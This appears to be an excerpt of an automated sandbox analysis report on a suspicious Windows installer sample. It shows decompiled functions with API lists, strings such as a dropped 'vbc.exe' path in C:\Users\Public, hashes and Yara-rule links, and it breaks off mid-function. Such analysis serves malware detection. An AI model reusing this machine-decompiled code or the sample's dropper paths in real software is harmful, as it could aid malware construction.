						if(_t97 != 0x1d) {
							__eflags = (_t97 << 0xa) + 0x425000;
							E00406228(_t90, (_t97 << 0xa) + 0x425000);
						} else {
							E00406186(_t90,  *0x424748);
						}
						__eflags = _t97 + 0xffffffeb - 7;
						if(_t97 + 0xffffffeb < 7) {
							L33:
							E00406503(_t90);
						}
						goto L42;
					}
					_t52 =  *0x42474c;
					__eflags = _t52;
					_t99 = 2;
					if(_t52 >= 0) {
						L13:
						_a8 = 1;
						L14:
						__eflags =  *0x4247e4;
						if( *0x4247e4 != 0) {
							_t99 = 4;
						}
						__eflags = _t80;
						if(__eflags >= 0) {
							__eflags = _t80 - 0x25;
							if(_t80 != 0x25) {
								__eflags = _t80 - 0x24;
								if(_t80 == 0x24) {
									GetWindowsDirectoryA(_t90, 0x400);
									_t99 = 0;
								}
								while(1) {
									__eflags = _t99;
									if(_t99 == 0) {
										goto L30;
									}
									_t53 =  *0x424744;
									_t99 = _t99 - 1;
									__eflags = _t53;
									if(_t53 == 0) {
										L26:
										_t55 = SHGetSpecialFolderLocation( *0x424748,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
										__eflags = _t55;
										if(_t55 != 0) {
											L28:
											 *_t90 =  *_t90 & 0x00000000;
											__eflags =  *_t90;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v8, _t90);
										_v12 = _t55;
										__imp__CoTaskMemFree(_v8);
										__eflags = _v12;
										if(_v12 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _a8;
									if(_a8 == 0) {
										goto L26;
									}
									_t57 =  *_t53( *0x424748,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
									__eflags = _t57;
									if(_t57 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryA(_t90, 0x400);
							goto L30;
						} else {
							E0040610F((_t80 & 0x0000003f) +  *0x424798, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x424798, _t90, _t80 & 0x00000040);
							__eflags =  *_t90;
							if( *_t90 != 0) {
								L31:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L33;
							}
							E004062BB(_t66, _t90, _t99, _t90, _v16);
							L30:
							__eflags =  *_t90;
							if( *_t90 == 0) {
								goto L33;
							}
							goto L31;
						}
					}
					__eflags = _t52 - 0x5a04;
					if(_t52 == 0x5a04) {
						goto L13;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L13;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L13;
					} else {
						_a8 = _a8 & 0x00000000;
						goto L14;
					}
				}
				 *_t90 =  *_t90 & 0x00000000;
				if(_a4 == 0) {
					return _t39;
				}
				return E00406228(_a4, _t39);
			}

0x004062bb
0x004062bb
0x004062bb
0x004062c1
0x004062c6
0x004062c8
0x004062d7
0x004062d7
0x004062df
0x004062e0
0x004062e1
0x004062e2
0x004062e5
0x004062ed
0x004062ef
0x00406306
0x00406309
0x00406309
0x004064e0
0x004064e0
0x004064e4
0x00000000
0x00000000
0x00406316
0x0040631c
0x00000000
0x00000000
0x00406322
0x00406323
0x00406326
0x00406329
0x004064d3
0x004064dd
0x004064df
0x004064df
0x004064d5
0x004064d7
0x004064d9
0x004064da
0x004064da
0x00000000
0x004064d3
0x0040632f
0x00406333
0x00406343
0x0040634a
0x0040634d
0x00406355
0x00406358
0x0040635f
0x00406360
0x00406363
0x00406480
0x00406483
0x004064b3
0x004064b6
0x004064bb
0x004064bf
0x004064bf
0x004064c4
0x004064ca
0x004064cc
0x00000000
0x004064cc
0x00406485
0x00406488
0x0040649d
0x004064a4
0x0040648a
0x00406491
0x00406491
0x004064ac
0x004064af
0x00406478
0x00406479
0x00406479
0x00000000
0x004064af
0x00406369
0x00406370
0x00406372
0x00406373
0x0040638d
0x0040638d
0x00406394
0x00406394
0x0040639b
0x0040639f
0x0040639f
0x004063a0
0x004063a2
0x004063db
0x004063de
0x004063ee
0x004063f1
0x004063f9
0x004063ff
0x004063ff
0x0040645e
0x0040645e
0x00406460
0x00000000
0x00000000
0x00406403
0x0040640a
0x0040640b
0x0040640d
0x00406427
0x00406435
0x0040643b
0x0040643d
0x0040645b
0x0040645b
0x0040645b
0x00000000
0x0040645b
0x00406443
0x0040644c
0x0040644f
0x00406455
0x00406459
0x00000000
0x00000000
0x00000000
0x00406459
0x0040640f
0x00406412
0x00000000
0x00000000
0x00406421
0x00406423
0x00406425
0x00000000
0x00000000
0x00000000
0x00406425
0x00000000
0x0040645e
0x004063e6
0x00000000
0x004063a4
0x004063bf
0x004063c4
0x004063c7
0x00406467
0x00406467
0x0040646b
0x00406473
0x00406473
0x00000000
0x0040646b
0x004063d1
0x00406462
0x00406462
0x00406465
0x00000000
0x00000000
0x00000000
0x00406465
0x004063a2
0x00406375
0x00406379
0x00000000
0x00000000
0x0040637b
0x0040637f
0x00000000
0x00000000
0x00406381
0x00406385
0x00000000
0x00406387
0x00406387
0x00000000
0x00406387
0x00406385
0x004064ea
0x004064f4
0x00406500
0x00406500
0x00000000

APIs

GetSystemDirectoryA.KERNEL32(uvlcopdlxoed,00000400), ref: 004063E6
GetWindowsDirectoryA.KERNEL32(uvlcopdlxoed,00000400,?,00420530,00000000,00405387,00420530,00000000), ref: 004063F9
SHGetSpecialFolderLocation.SHELL32(00405387,00000000,?), ref: 00406435
SHGetPathFromIDListA.SHELL32(00000000,uvlcopdlxoed), ref: 00406443
CoTaskMemFree.OLE32(00000000), ref: 0040644F
lstrcatA.KERNEL32(uvlcopdlxoed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406473
lstrlenA.KERNEL32(uvlcopdlxoed,?,00420530,00000000,00405387,00420530,00000000,00000000,00000000,00000000), ref: 004064C5

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 004063B5
uvlcopdlxoed, xrefs: 004062E5, 004063B2, 004063B3, 004063B4, 004063D0, 004063E5, 004063F8, 00406414, 0040643F, 00406472, 00406478, 00406490, 004064A3, 004064BE, 004064C4, 004064CC, 004064F6
\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040646D

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$uvlcopdlxoed
API String ID: 717251189-2520582795
Opcode ID: bc9471c6cf8ae6720703e8417b03b042a63b45d26e40513c79d31308c85558e4
Instruction ID: f83f29d570338ae078c2f0a770e3e6ec7f31d765c13aaba4f9587f8cbfb2a84b
Opcode Fuzzy Hash: bc9471c6cf8ae6720703e8417b03b042a63b45d26e40513c79d31308c85558e4
Instruction Fuzzy Hash: 22610071A00214AEDF209F64D984BBA3BA4EB55714F12413FE913BA2D1C37C8962CB5E

Uniqueness

Uniqueness Score: -1.00%

Function 00406503, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406503(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E00405C2D(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405BEB("*?|<>/\":", _t5))) == 0) {
							E00405D7C(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00406505
0x0040650d
0x00406521
0x00406521
0x00406527
0x00406534
0x00406534
0x00406535
0x00406537
0x0040653b
0x0040653d
0x00406546
0x00406548
0x00406562
0x0040656a
0x0040656a
0x0040656f
0x00406571
0x00406573
0x00406577
0x00406578
0x0040657b
0x00406583
0x00406585
0x00406589
0x00000000
0x00000000
0x0040658f
0x00406594
0x00000000
0x00000000
0x00000000
0x00406594
0x00406599

APIs

CharNextA.USER32(?), ref: 0040655B
CharNextA.USER32(?), ref: 00406568
CharNextA.USER32(?), ref: 0040656D
CharPrevA.USER32(?,?), ref: 0040657D

Strings

"C:\Users\Public\vbc.exe" , xrefs: 0040653F
*?|<>/":, xrefs: 0040654B
C:\Users\user\AppData\Local\Temp\, xrefs: 00406504

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\Public\vbc.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-1374994687
Opcode ID: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
Instruction ID: ed4a40943fe5e2665a2a55f9ea129fd4e03433fedea2fb13391fe05f183277a3
Opcode Fuzzy Hash: 6624216dd93989c3e415f19addad0263e6dff954d131d517deda7fd7c47402c7
Instruction Fuzzy Hash: 5511E26180479139EB3216386C44B77BFD84B577A0F19007FE9C2722CAD67C5C62826D

Uniqueness

Uniqueness Score: -1.00%

Function 00404313, Relevance: 12.1, APIs: 8, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404313(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t39;
				long _t41;
				void* _t44;
				signed char _t50;
				long* _t54;

				if(_a4 + 0xfffffecd > 5) {
					L18:
					return 0;
				}
				_t54 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
					goto L18;
				} else {
					_t50 = _t54[5];
					if((_t50 & 0xffffffe0) != 0) {
						goto L18;
					}
					_t39 =  *_t54;
					if((_t50 & 0x00000002) != 0) {
						_t39 = GetSysColor(_t39);
					}
					if((_t54[5] & 0x00000001) != 0) {
						SetTextColor(_a8, _t39);
					}
					SetBkMode(_a8, _t54[4]);
					_t41 = _t54[1];
					_v16.lbColor = _t41;
					if((_t54[5] & 0x00000008) != 0) {
						_t41 = GetSysColor(_t41);
						_v16.lbColor = _t41;
					}
					if((_t54[5] & 0x00000004) != 0) {
						SetBkColor(_a8, _t41);
					}
					if((_t54[5] & 0x00000010) != 0) {
						_v16.lbStyle = _t54[2];
						_t44 = _t54[3];
						if(_t44 != 0) {
							DeleteObject(_t44);
						}
						_t54[3] = CreateBrushIndirect( &_v16);
					}
					return _t54[3];
				}
			}

0x00404325
0x004043db
0x00000000
0x004043db
0x00404336
0x0040433a
0x00000000
0x00404354
0x00404354
0x0040435d
0x00000000
0x00000000
0x0040435f
0x0040436b
0x0040436e
0x0040436e
0x00404374
0x0040437a
0x0040437a
0x00404386
0x0040438c
0x00404393
0x00404396
0x00404399
0x0040439b
0x0040439b
0x004043a3
0x004043a9
0x004043a9
0x004043b3
0x004043b8
0x004043bb
0x004043c0
0x004043c3
0x004043c3
0x004043d3
0x004043d3
0x00000000
0x004043d6

APIs

GetWindowLongA.USER32(?,000000EB), ref: 00404330
GetSysColor.USER32 ref: 0040436E
SetTextColor.GDI32(?,00000000), ref: 0040437A
SetBkMode.GDI32(?,?), ref: 00404386
GetSysColor.USER32 ref: 00404399
SetBkColor.GDI32(?,?), ref: 004043A9
DeleteObject.GDI32(?), ref: 004043C3
CreateBrushIndirect.GDI32(?), ref: 004043CD

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
Instruction ID: 4ebf73092ad7484045a31fabae3cd442355fcbc25dfc518f848a7595e5b54366
Opcode Fuzzy Hash: dc1d3e55db8ec23378b3830e5d111dcc895b5f12cd74b581ce4b7be4d8059b2f
Instruction Fuzzy Hash: 592165716007049BCB309F68E948B5BBBF8AF41710B05892EED96E26E0D774E814CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040534F, Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040534F(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423f24; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x424814;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E004062BB(0, _t39, 0x420530, 0x420530, _a4);
					}
					_t26 = lstrlenA(0x420530);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423f08, 0x420530);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x420530;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x420530)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x420530, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x00405355
0x00405361
0x00405364
0x0040536a
0x00405376
0x00405379
0x0040537c
0x00405382
0x00405382
0x00405388
0x00405390
0x00405393
0x004053b0
0x004053b4
0x004053bd
0x004053bd
0x004053c7
0x004053d0
0x004053dc
0x004053e3
0x004053e7
0x004053ea
0x004053fd
0x0040540b
0x0040540b
0x0040540f
0x00405411
0x00405414
0x00000000
0x00405414
0x00405395
0x0040539d
0x004053a5
0x004053ab
0x00000000
0x004053ab
0x004053a5
0x00405393
0x0040541e

APIs

lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
SendMessageA.USER32 ref: 004053E3
SendMessageA.USER32 ref: 004053FD
SendMessageA.USER32 ref: 0040540B

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 1758c99315444ffa8de3e4a805647494e46ff97573bb8ff712cd1a67f4e860c0
Instruction ID: d7aab4fbb83e072b647ad5d9ecd44a72e262910ab30c50883f082c619406a612
Opcode Fuzzy Hash: 1758c99315444ffa8de3e4a805647494e46ff97573bb8ff712cd1a67f4e860c0
Instruction Fuzzy Hash: 54218171900118BBDB11AF95DD84ADEBFB9EF04354F14807AF944B6291C7788E918F98

Uniqueness

Uniqueness Score: -1.00%

Function 00402E52, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402E52(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x41f904; // 0x0
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x41f904 = 0;
					return _t15;
				}
				__eflags =  *0x41f904; // 0x0
				if(__eflags != 0) {
					return E0040666D(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x424750;
				if(_t6 >  *0x424750) {
					__eflags =  *0x424748;
					if( *0x424748 == 0) {
						_t7 = CreateDialogParamA( *0x424740, 0x6f, 0, E00402DBA, 0);
						 *0x41f904 = _t7;
						return ShowWindow(_t7, 5);
					}
					__eflags =  *0x424814 & 0x00000001;
					if(( *0x424814 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402E36());
						return E0040534F(0,  &_v68);
					}
				}
				return _t6;
			}

0x00402e5e
0x00402e60
0x00402e67
0x00402e6a
0x00402e6a
0x00402e70
0x00000000
0x00402e70
0x00402e78
0x00402e7e
0x00000000
0x00402e81
0x00402e88
0x00402e8e
0x00402e94
0x00402e96
0x00402e9c
0x00402eda
0x00402ee3
0x00000000
0x00402ee8
0x00402e9e
0x00402ea5
0x00402eb6
0x00000000
0x00402ec4
0x00402ea5
0x00402ef0

APIs

DestroyWindow.USER32 ref: 00402E6A
GetTickCount.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040306B), ref: 00402E88
wsprintfA.USER32 ref: 00402EB6

Part of subcall function 0040534F: lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
Part of subcall function 0040534F: lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
Part of subcall function 0040534F: lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
Part of subcall function 0040534F: SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
Part of subcall function 0040534F: SendMessageA.USER32 ref: 004053E3
Part of subcall function 0040534F: SendMessageA.USER32 ref: 004053FD
Part of subcall function 0040534F: SendMessageA.USER32 ref: 0040540B

CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402EDA
ShowWindow.USER32(00000000,00000005), ref: 00402EE8

Part of subcall function 00402E36: MulDiv.KERNEL32 ref: 00402E4B

Strings

... %d%%, xrefs: 00402EB0

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: bb3bd4b2b9508e1df3cc882d5ccfee83ca66d66d4289bc98e9bfc3421e5f8959
Instruction ID: 7a453c914e71352c87dd6fc4fa143b29ed4b83a6d55c3b122a6f25389f326a81
Opcode Fuzzy Hash: bb3bd4b2b9508e1df3cc882d5ccfee83ca66d66d4289bc98e9bfc3421e5f8959
Instruction Fuzzy Hash: 22018470582214E7CB61AB64EF0DAAF766CEB41745B14403BF801F21E0C7B95846CAEE

Uniqueness

Uniqueness Score: -1.00%

Function 00404BFF, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404BFF(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404c0d
0x00404c1a
0x00404c20
0x00404c5e
0x00404c5e
0x00404c6d
0x00404c74
0x00000000
0x00404c76
0x00404c22
0x00404c31
0x00404c39
0x00404c3c
0x00404c4e
0x00404c54
0x00404c5b
0x00000000
0x00404c5b
0x00000000

APIs

SendMessageA.USER32 ref: 00404C1A
GetMessagePos.USER32 ref: 00404C22
ScreenToClient.USER32(?,?), ref: 00404C3C
SendMessageA.USER32 ref: 00404C4E
SendMessageA.USER32 ref: 00404C74

Strings

f, xrefs: 00404C50

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
Instruction ID: 8affecd5b479f1171f5654815cc51d63bffccf6ae5a63c5c4c29235a80b14989
Opcode Fuzzy Hash: fae6ee4ef260730fd0e6baeb46c05ac4d0d99299cd6b7910a3b5b88b2e21feb9
Instruction Fuzzy Hash: 34015E71900219BBEB00DBA4DD85FFFBBBCAF55711F10012BBA50B61D0D7B4A9418BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00402DBA, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402E36();
					_t19 = "unpacking data: %d%%";
					if( *0x424754 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402dc7
0x00402dd5
0x00402ddb
0x00402ddb
0x00402de9
0x00402deb
0x00402df7
0x00402dfc
0x00402dfe
0x00402dfe
0x00402e09
0x00402e19
0x00402e2b
0x00402e2b
0x00402e33

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
wsprintfA.USER32 ref: 00402E09
SetWindowTextA.USER32(?,?), ref: 00402E19
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E2B

Strings

unpacking data: %d%%, xrefs: 00402DF7, 00402E07
verifying installer: %d%%, xrefs: 00402DFE

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: 682236bfa9d44e469b32297ddf894a90f4f99da74b05dcaaf7480c0445501217
Instruction ID: 5924424b8475f9adf48b5715c1e1f77af8692632bd00ddb5f136e7bd4fbbb8aa
Opcode Fuzzy Hash: 682236bfa9d44e469b32297ddf894a90f4f99da74b05dcaaf7480c0445501217
Instruction Fuzzy Hash: 36F01D7154020DFBEF20AF60DE0ABAE3769EB54345F00803AFA16B51D0DBB899558B99

Uniqueness

Uniqueness Score: -1.00%

Function 004027DF, Relevance: 9.1, APIs: 6, Instructions: 86
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004027DF(void* __ebx, void* __eflags) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
				_t50 = E00402BCE(0xfffffff0);
				 *(_t56 - 0x78) = _t23;
				if(E00405C2D(_t50) == 0) {
					E00402BCE(0xffffffed);
				}
				E00405D9C(_t50);
				_t26 = E00405DC1(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x424758;
					 *(_t56 - 0x30) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E00403419(_t45);
						E00403403(_t49,  *(_t56 - 0x30));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x38) = _t54;
						if(_t54 != _t45) {
							E00403192(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x8c) =  *_t54;
								E00405D7C( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x8c);
							}
							GlobalFree( *(_t56 - 0x38));
						}
						E00405E68( *(_t56 + 8), _t49,  *(_t56 - 0x30));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0xc)) = E00403192(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileA( *(_t56 - 0x78));
